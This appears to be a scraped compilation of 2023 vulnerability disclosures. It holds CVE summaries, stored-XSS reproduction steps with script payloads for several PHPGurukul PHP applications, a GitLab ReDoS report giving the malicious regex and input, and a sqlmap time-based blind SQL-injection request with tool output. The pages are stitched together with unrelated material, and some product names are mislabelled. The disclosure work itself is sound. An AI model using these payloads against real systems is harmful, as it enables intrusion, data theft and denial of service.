A NULL pointer dereference flaw was found in the Linux kernel's drivers/gpu/drm/msm/msm_gem_submit.c code in the submit_lookup_cmds function, which fails because it lacks a check of the return value of kmalloc(). This issue allows a local user to crash the system.

CVE-2023-3355

PHPgurukl Hostel Management System v.1.0 is vulnerable to Cross Site Scripting (XSS) via Add New Course.

\# Hostel Management System v.1.0 - Stored Cross-Site Scripting (XSS)Vulnerability

\## Stored Cross Site Scripting Vulnerability found in Hostel Management System v.1.0

Vulnerability Description -

The Hostel Management System v.1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application.

Steps to Reproduce -

The following steps demonstrate how to exploit the Stored XSS vulnerability in the Hostel Management System v.1.0:

1\. Visit the Hostel Management System v.1.0 application by accessing the URL: http://localhost/hostel/index.php.

2\. Click on the "Admin" button to navigate to the admin login page.

3\. Login to the Admin account using the default credentials.

\- Username: admin

\- Password: Test@123

4\. Proceed to the Admin Profile page.

5\. Click on Courses, and Add New Course, Within the "Course Code" "Course Name(Short)" "Course Name(Full)" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.

6\. Click on the "Submit" button.

7\. Refresh the page, and the injected payload will be executed.

As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

\*\*Reference: CVE-2023-34652\*\*

CVE-2023-34652: Common-Vulnerabilities-and-Exposures/CVE-2023-34652 at main · ckalnarayan/Common-Vulnerabilities-and-Exposures

Improper access control vulnerability in SearchWidget prior to version 3.3 in China models allows untrusted applications to start arbitrary activity.

This Cookie Policy describes the different types of cookies that may be used in connection with Samsung Mobile Security website which is owned and controlled by Samsung Electronics Co., Ltd (“Samsung Electronics”). This Cookie Policy also describes how you can manage cookies.

It’s important that you check back often for updates to the Policy as we may change it from time to time to reflect changes to our use of cookies. Please check the date at the top of this page to see when this Policy was last revised. Any changes to this Policy will become effective when we make the revised Policy available on our website.

Samsung Electronics has offices across Europe, so we can ensure that your request or query will be handled by the data protection team based in your region. If you have any questions, the easiest way to contact us is through our Privacy Support Page at https://www.samsung.com/request-desk.

You can also contact us at:

European Data Protection Officer  
Samsung Electronics (UK) Limited  
Samsung House, 2000 Hillswood Drive, Chertsey, Surrey KT16 0RS

**Cookies**

Cookies are small files that store information on your computer, TV, mobile phone, or other device. They enable the entity that put the cookie on your device to recognize you across different websites, services, devices, and/or browsing sessions.

We use the following types of cookies on this website:

**Essential Cookies**: enable you to receive the services you request via our website. Without these cookies, services that you have asked for cannot be provided. For example, these enable to identify users and provide proper service for each user. These cookies are automatically enabled and cannot be turned off because they are essential to enable you to browse our website. Without these cookies this Samsung Mobile Security website could not be provided.

Cookie

Domain

Purpose

JSESSIONID

security.samsungmobile.com

to keep login session

lastActivityTime

security.samsungmobile.com

to save the user's last activity time to automatically logout after 30 minutes of inactivity

**Managing Cookies and Other Technologies**

You can also update your browser settings at any time, if you want to remove or block cookies from your device (consult your browser's "help" menu to learn how to remove or block cookies). Samsung Electronics is not responsible for your browser settings. You can find good and simple instructions on how to manage cookies on the different types of web browsers at http://www.allaboutcookies.org.

CVE-2023-21518: Samsung Mobile Security

An issue has been discovered in GitLab affecting all versions starting from 15.10 before 16.1, leading to a ReDoS vulnerability in the Jira prefix

Skip to content

Open Issue created Apr 21, 2023 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**ReDoS in Jira prefix**

⚠ **Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**

**HackerOne report #1934802** by yvvdwf on 2023-04-05, assigned to @dcouture:

Report | Attachments | How To Reproduce

**Report**

Hi,

Gitlab recently add a new feature that allows specifying a regex to recognize Jira issues:

    ###  app/models/integrations/jira.rb#L351  
        def jira_issue_match_regex  
          match_regex = (jira_issue_regex.presence || Gitlab::Regex.jira_issue_key_regex)
    
          /\b#{jira_issue_prefix}(?<issue>#{match_regex})/  
        end  

jira_issue_prefix and jira_issue_regex are user input which can cause ReDoS attack

**Steps to reproduce**

This feature is available on gitlab.com but not yet on user instance, so I tested this on gitlab.com and confirm it via Gitpod:

1.  In an existing project, or create a new project, enable Jira integration:

*   fill the required inputs as you want but the two following allows ReDoS:
*   Jira issue regex: ((a|b)+|c)+$
*   Jira issue prefix: JIRA

2.  Open a new issue:

*   title: test-jira
*   Write: JIRAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1
*   click Save changes button
*   we can see that the puma server uses 100% CPU, then restarts after 5 minutes.

Error on gitlab.com:  

**Impact**

This ReDoS issue causes deny of service at the back-end

**What is the current _bug_ behavior?**

User input is not sanitized

**What is the expected _correct_ behavior?**

User input should be sanitized before using in a regex

**Output of checks**

This bug happens on GitLab.com

**Impact**

This ReDoS issue causes deny of service at the back-end

**Attachments**

**Warning:** Attachments received through HackerOne, please exercise caution!

*   issue.png
*   jira-setting.png
*   500\_Error\_-\_GitLab.png

**How To Reproduce**

Please add reproducibility information to this section:

CVE-2023-2232: ReDoS in Jira prefix (#408352) · Issues · GitLab.org / GitLab · GitLab

PHPgurukl Hospital Management System v.1.0 is vulnerable to Cross Site Scripting (XSS).

Permalink

Cannot retrieve contributors at this time

\# Hospital Management System in php v.1.0 - Stored Cross-Site Scripting (XSS)Vulnerability

\## Stored Cross Site Scripting Vulnerability found in Hospital Management System in php v.1.0

Vulnerability Description -

The Hospital Management System in php v.1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application.

Steps to Reproduce -

The following steps demonstrate how to exploit the Stored XSS vulnerability in the Hostel Management System v.1.0:

1\. Visit the Hospital Management System in php v.1.0 application by accessing the URL: http://localhost/hospital/

2\. Click on the "Patient Login" and Creat New Patient Account

"Full Name" "Address" "City" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.

3\. Click on the "Submit" button.

3\. Login to the Patient account using the Email id and Password Which You Have Entered, injected payload will be executed.

4\. Go to the Edit Account Details Page,

"Full Name" "Address" "City" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.

6\. Click on the "Submit" button.

7\. Refresh the page, and the injected payload will be executed.

As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

\*\*Reference: CVE-2023-34651\*\*

CVE-2023-34651: Common-Vulnerabilities-and-Exposures/CVE-2023-34651 at main · ckalnarayan/Common-Vulnerabilities-and-Exposures

PHPgurukl Small CRM v.1.0 is vulnerable to Cross Site Scripting (XSS).

\# Small CRM v.1.0 - Stored Cross-Site Scripting (XSS)Vulnerability

\## Stored Cross Site Scripting Vulnerability found in Small CRM v.1.0

Vulnerability Description -

The Small CRM v.1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application.

Steps to Reproduce -

The following steps demonstrate how to exploit the Stored XSS vulnerability in the Hostel Management System v.1.0:

1\. Visit the Small CRM v.1.0 application by accessing the URL: http://localhost/crm/index.php

2\. Click on the "User Sign Up" and Creat New User Account

"Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.

3\. Click on the "Submit" button.

4\. Login to the User account using the Email id and Password Which You Have Entered, injected payload will be executed.

5\. Also Login Through Admin Account, Click on Users Option

6\. Refresh the page, and the injected payload will be executed.

As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.

\*\*Reference: CVE-2023-34650\*\*

CVE-2023-34650: Common-Vulnerabilities-and-Exposures/CVE-2023-34650 at main · ckalnarayan/Common-Vulnerabilities-and-Exposures

Heap out-of-bound write vulnerability in Exynos baseband prior to SMR Jun-2023 Release 1 allows remote attacker to execute arbitrary code.

CVE-2023-21517: Samsung Mobile Security

An issue has been discovered in GitLab affecting all versions starting from 15.7 before 15.8.5, from 15.9 before 15.9.4, and from 15.10 before 15.10.1 that allows for crafted, unapproved MRs to be introduced and merged without authorization

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Topics Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

*   cves
*   2022
*   **CVE-2022-4143.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · a571cd88
    
    🤖 GitLab Bot 🤖 authored Jun 28, 2023
    
    a571cd88

CVE-2022-4143: 2022/CVE-2022-4143.json · master · GitLab.org / cves · GitLab

Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.

\# Exploit Title:Lost and Found Information System v1.0 - Sql Injection # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html # Version: V1.0.0 # Tested on:Linux REQUEST POST /php-lfis/classes/SystemSettings.php?f=update\_settings HTTP/1.1 Host: localhost Content-Length: 454 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2NerUgrr08nxdAqe X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-lfis/admin/?page=system\_info/contact\_information Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=fncg346s7j3fr654lsapbb8sqs Connection: close ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="phone" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="email" test1@test.com ------WebKitFormBoundary2NerUgrr08nxdAqe Content-Disposition: form-data; name="address" test1 ------WebKitFormBoundary2NerUgrr08nxdAqe-- sqlmap -r lfis.txt --random-agent --batch -tamper=space2comment --dbs \[!\] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program \[\*\] starting @ 22:21:18 /2023-05-11/ \[22:21:18\] \[INFO\] parsing HTTP request from 'lfis.txt' \[22:21:18\] \[INFO\] loading tamper module 'space2comment' \[22:21:18\] \[INFO\] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30' from file '/usr/share/sqlmap/data/txt/user-agents.txt' Multipart-like data found in POST body. Do you want to process it? \[Y/n/q\] Y \[22:21:18\] \[INFO\] resuming back-end DBMS 'mysql' \[22:21:18\] \[INFO\] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: MULTIPART phone ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="phone''' AND (SELECT 1875 FROM (SELECT(SLEEP(5)))oGnm) AND 'hBeF'='hBeF ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="mobile" 1234567890 ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="email" test@test.com ------WebKitFormBoundarydhpsLF47Y6ZvrvP2 Content-Disposition: form-data; name="address" test ------WebKitFormBoundarydhpsLF47Y6ZvrvP2-- --- \[22:21:18\] \[WARNING\] changes made by tampering scripts are not included in shown payload content(s) \[22:21:18\] \[INFO\] the back-end DBMS is MySQL web application technology: PHP 8.1.17, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) \[22:21:18\] \[INFO\] fetching database names \[22:21:18\] \[INFO\] fetching number of databases \[22:21:18\] \[WARNING\] time-based comparison requires larger statistical model, please wait.............................. (done) \[22:21:18\] \[WARNING\] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions \[22:21:18\] \[WARNING\] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' \[22:21:18\] \[ERROR\] unable to retrieve the number of databases \[22:21:18\] \[INFO\] falling back to current database \[22:21:18\] \[INFO\] fetching current database \[22:21:18\] \[INFO\] resumed: lfis\_db available databases \[1\]: \[\*\] lfis\_db \[22:21:18\] \[INFO\] fetched data logged to text files under '/root/.local/share/sqlmap/output/localhost' \[22:21:18\] \[WARNING\] your sqlmap version is outdated \[\*\] ending @ 22:21:18 /2023-05-11/

CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE

An unauthenticated attacker within BLE proximity can remotely connect to a 7-Eleven LED Message Cup, Hello Cup 1.3.1 for Android, and bypass the application's client-side chat censor filter.

\*\* 7-Eleven Bluetooth Smart Cup Jailbreak \*\*

****

In 2019 7-Eleven distributed a limited promotional item they generically named the 'Custom Message Cup’\*.

*   https://fccid.io/2AQNV-60961HC

Customers could personalize their cups with their own messages & slogans.

The cup consists of a plastic shell lined with an LED strip that communicates via BlueTooth Low Energy & allows users to send messages from their mobile device & is available for Android & iOs.

There is a word filter restriction on this promotional cup that displays filtered words using asterixis '\*'.

Searching the source via JADX-GUI revealed the de-facto list of vulgar words & the regex word filter accomplished via client-side filtering\* so I proceeded to edit that wordlist.

APK Easy Tool was effective in providing a turn-key solution to decompile, sign & recompile the 'Hello Cup'(v1.3.1) Application.

The first step was to retrieve the Smali resource files that is essentially specialized assembly language code that is used to represent the Dalvik bytecode of Android applications & specific to the Android runtime environment.

Because I quit ‘Pokemon GO’ only the string 'pogo' will be restricted & everything else previously banned such as 'ugly' (really?) will no longer be filtered.

As a result the message 'UGLY POGO STICK' previously rendered as '\*\*\*\* POGO STICK' will now display 'UGLY \*\*\*\* STICK'.

Although modifying the application was trivial, it served as an interesting illustration bypassing client-side filtering.

\*\* CWE-602: Client-Side Enforcement of Server-Side Security

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34761

Source

CVE